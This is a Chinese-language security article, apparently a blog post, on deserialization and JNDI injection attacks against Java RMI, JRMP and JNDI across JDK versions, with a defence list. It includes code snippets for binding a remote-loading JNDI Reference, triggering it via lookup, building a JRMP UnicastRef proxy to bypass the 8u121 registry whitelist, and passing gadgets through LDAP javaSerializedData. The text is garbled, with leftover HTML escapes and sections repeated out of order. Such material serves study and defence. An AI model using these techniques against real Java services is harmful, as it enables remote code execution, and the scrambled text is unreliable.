RMI、JRMP与JNDI安全机制深度解析<\/h1>

0x01 前言<\/h2>
本文深入分析Java远程方法调用(RMI)、Java远程方法协议(JRMP)和Java命名与目录接口(JNDI)的安全机制，通过源码层面剖析不同JDK版本下的攻击与防御策略。<\/p>

0x02 RMI基础架构<\/h2>

RMI核心组件<\/h3>

RMI Registry<\/strong>：注册中心服务，存储远程对象引用<\/p>

创建方式：LocateRegistry.createRegistry(1099)<\/code><\/li>
返回类型：sun.rmi.registry.RegistryImpl<\/code><\/li> <\/ul> <\/li>
服务端<\/strong>：提供远程服务的实现<\/p> 必须实现Remote<\/code>接口并继承UnicastRemoteObject<\/code><\/li> 注册示例： LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>).<\/span>bind<\/span>(<\/span>"hello"<\/span>,<\/span> new<\/span> HelloServiceImpl());<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 客户端<\/strong>：调用远程服务的消费者<\/p> 查找示例： HelloService helloService =<\/span> (<\/span>HelloService)<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>).<\/span>lookup<\/span>(<\/span>"hello"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 通信流程<\/h3> 服务端通过bind()<\/code>将stub对象发送到RMI Registry<\/li> 客户端通过lookup()<\/code>从RMI Registry获取stub<\/li> 客户端通过stub对象发起远程方法调用<\/li> <\/ol> 0x03 攻击面分析<\/h2> 攻击目标分类<\/h3> RMI Client<\/strong>：通过恶意服务端或Registry攻击<\/li> RMI Server<\/strong>：通过恶意客户端攻击<\/li> RMI Registry<\/strong>：通过恶意客户端或服务端攻击<\/li> <\/ol> 攻击方式<\/h3> 1. 反序列化攻击<\/h4> Registry攻击点<\/strong>：<\/p> bind()<\/code>操作：case 0处理逻辑中反序列化参数<\/li> lookup()<\/code>操作：case 2处理逻辑中反序列化返回数据<\/li> <\/ul> <\/li> 服务端攻击点<\/strong>：<\/p> 远程方法调用参数反序列化<\/li> 方法返回结果反序列化<\/li> <\/ul> <\/li> <\/ul> 2. Reference远程代码加载<\/h4> 通过JNDI Reference实现无gadget依赖的RCE：<\/p> Reference reference =<\/span> new<\/span> Reference(<\/span>"Calc"<\/span>,<\/span>"Calc"<\/span>,<\/span>"http:\/\/localhost\/"<\/span>);<\/span> <\/span><\/span>ReferenceWrapper referenceWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>reference);<\/span> <\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"Calc"<\/span>,<\/span>referenceWrapper);<\/span> <\/span><\/span><\/code><\/pre>客户端触发：<\/p> new<\/span> InitialContext().<\/span>lookup<\/span>(<\/span>"rmi:\/\/127.0.0.1:1099\/Calc"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>0x04 JDK版本演进与防御机制<\/h2> jdk8u121之前<\/h3> 攻击特点<\/strong>：<\/p> 无限制的反序列化<\/li> 可直接使用各种gadget进行攻击<\/li> JNDI Reference远程加载无限制<\/li> <\/ul> jdk8u121关键变更<\/h3> 新增防御<\/strong>：<\/p> RMI反序列化白名单<\/strong>：<\/p> 实现于sun.rmi.registry.RegistryImpl#registryFilter<\/code><\/li> 允许的类： String.class<\/code><\/li> Number.class<\/code><\/li> Remote.class<\/code><\/li> Proxy.class<\/code><\/li> UnicastRef.class<\/code><\/li> RMIClientSocketFactory.class<\/code><\/li> RMIServerSocketFactory.class<\/code><\/li> ActivationID.class<\/code><\/li> UID.class<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> RMI Reference信任机制<\/strong>：<\/p> 系统属性com.sun.jndi.rmi.object.trustURLCodebase<\/code>默认为false<\/li> <\/ul> <\/li> <\/ol> 绕过方法<\/strong>：<\/p> 使用UnicastRef<\/code>白名单类构造JRMP攻击： ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span> <\/span><\/span>TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>host,<\/span> port);<\/span> <\/span><\/span>UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span> <\/span><\/span>RemoteObjectInvocationHandler obj =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span> <\/span><\/span>Registry proxy =<\/span> (<\/span>Registry)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>JRMPClient.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]<\/span> {<\/span> Registry.<\/span>class<\/span> },<\/span> obj);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> jdk8u191关键变更<\/h3> 新增防御<\/strong>：<\/p> LDAP Reference信任机制<\/strong>：系统属性com.sun.jndi.ldap.object.trustURLCodebase<\/code>默认为false<\/li> <\/ul> <\/li> <\/ol> 绕过方法<\/strong>：<\/p> 使用LDAP的javaSerializedData<\/code>属性传递序列化gadget：<\/p> e.<\/span>addAttribute<\/span>(<\/span>"javaSerializedData"<\/span>,<\/span> serializedGadget);<\/span> <\/span><\/span><\/code><\/pre>触发点在com.sun.jndi.ldap.Obj#deserializeObject<\/code>：<\/p> private<\/span> static<\/span> Object deserializeObject<\/span>(<\/span>byte<\/span>[]<\/span> var0,<\/span> ClassLoader var1)<\/span> throws<\/span> NamingException {<\/span> <\/span><\/span> \/\/ 反序列化逻辑 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 0x05 攻击技术总结<\/h2> 攻击方式<\/th> 适用版本<\/th> 依赖条件<\/th> 备注<\/th> <\/tr> <\/thead> 直接反序列化<\/td> <8u121<\/td> 需要gadget依赖<\/td> 利用bind\/lookup<\/td> <\/tr> JNDI Reference(RMI)<\/td> <8u121<\/td> 无gadget依赖<\/td> 远程加载代码<\/td> <\/tr> JNDI Reference(LDAP)<\/td> 8u121-8u191<\/td> 无gadget依赖<\/td> 远程加载代码<\/td> <\/tr> JRMP Gadget<\/td> >=8u121<\/td> 需要gadget依赖<\/td> 绕过白名单<\/td> <\/tr> LDAP SerializedData<\/td> >=8u191<\/td> 需要gadget依赖<\/td> 替代Reference<\/td> <\/tr> <\/tbody> <\/table> 0x06 防御建议<\/h2> 升级JDK至最新版本<\/li> 限制网络访问，特别是RMI Registry端口<\/li> 移除不必要的gadget依赖<\/li> 配置安全策略文件限制代码加载<\/li> 监控可疑的JRMP和LDAP连接<\/li> <\/ol> 0x07 参考资源<\/h2> 如何绕过高版本JDK的限制进行JNDI注入利用<\/a><\/li> Java中RMI、JNDI、LDAP、JRMP、JMX、JMS那些事儿<\/a><\/li> Oracle官方安全公告<\/a><\/li> <\/ol>

攻击方式<\/th>	适用版本<\/th>	依赖条件<\/th>	备注<\/th> <\/tr> <\/thead>
直接反序列化<\/td>	<8u121<\/td>	需要gadget依赖<\/td>	利用bind\/lookup<\/td> <\/tr>
JNDI Reference(RMI)<\/td>	<8u121<\/td>	无gadget依赖<\/td>	远程加载代码<\/td> <\/tr>
JNDI Reference(LDAP)<\/td>	8u121-8u191<\/td>	无gadget依赖<\/td>	远程加载代码<\/td> <\/tr>
JRMP Gadget<\/td>	>=8u121<\/td>	需要gadget依赖<\/td>	绕过白名单<\/td> <\/tr>
LDAP SerializedData<\/td>	>=8u191<\/td>	需要gadget依赖<\/td>	替代Reference<\/td> <\/tr> <\/tbody> <\/table> 0x06 防御建议<\/h2> 升级JDK至最新版本<\/li> 限制网络访问，特别是RMI Registry端口<\/li> 移除不必要的gadget依赖<\/li> 配置安全策略文件限制代码加载<\/li> 监控可疑的JRMP和LDAP连接<\/li> <\/ol> 0x07 参考资源<\/h2> 如何绕过高版本JDK的限制进行JNDI注入利用<\/a><\/li> Java中RMI、JNDI、LDAP、JRMP、JMX、JMS那些事儿<\/a><\/li> Oracle官方安全公告<\/a><\/li> <\/ol>

RMI、JRMP与JNDI安全机制深度解析<\/h1>

0x01 前言<\/h2> 本文深入分析Java远程方法调用(RMI)、Java远程方法协议(JRMP)和Java命名与目录接口(JNDI)的安全机制，通过源码层面剖析不同JDK版本下的攻击与防御策略。<\/p>

0x02 RMI基础架构<\/h2>

0x03 攻击面分析<\/h2>

攻击方式<\/h3>

0x04 JDK版本演进与防御机制<\/h2>

0x07 参考资源<\/h2> 如何绕过高版本JDK的限制进行JNDI注入利用<\/a><\/li> Java中RMI、JNDI、LDAP、JRMP、JMX、JMS那些事儿<\/a><\/li> Oracle官方安全公告<\/a><\/li> <\/ol>

0x01 前言<\/h2>
本文深入分析Java远程方法调用(RMI)、Java远程方法协议(JRMP)和Java命名与目录接口(JNDI)的安全机制，通过源码层面剖析不同JDK版本下的攻击与防御策略。<\/p>

0x07 参考资源<\/h2>

如何绕过高版本JDK的限制进行JNDI注入利用<\/a><\/li>
Java中RMI、JNDI、LDAP、JRMP、JMX、JMS那些事儿<\/a><\/li>
Oracle官方安全公告<\/a><\/li> <\/ol>